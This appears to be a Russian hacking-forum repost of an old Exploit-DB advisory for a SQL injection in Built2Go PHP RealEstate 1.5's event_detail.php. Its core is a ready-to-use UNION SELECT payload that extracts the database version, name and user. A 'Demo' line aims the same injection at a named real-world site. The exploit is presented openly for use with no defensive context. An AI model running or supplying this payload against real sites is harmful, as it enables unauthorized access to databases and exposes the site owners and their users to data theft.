Exploit Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6697
Проверка EDB
  1. Пройдено
Автор
D3V1L
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-4497
Дата публикации
2008-10-07
Код:
[~]-----------------------------------------------------------------------------
[~] Built2Go PHP RealEstate v1.5 (event_detail.php) - SQL Injection Vulnerability
[~]
[~] [A professional real estate listings website.
[~] Lists homes for sale and apartments for rent,
[~] and provides a powerful search similar to the professional realtor websites.
[~] Allow visitors to list for free, or enforce free or paid registrations.]
[~] Price :- $69.95
[~] http://www.hotscripts.com/Detailed/59295.html
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 07.10.2008
[~]
[~]
[~] [email protected]  http://security-sh3ll.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/event_detail.php?event_id=-1 UNION SELECT
1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
[~]
[~] Demo :-
[~]
[~] http://www.agrents.com/event_detail.php?event_id=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
[~]
[~]--------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-10-07]
 
Источник
www.exploit-db.com

Похожие темы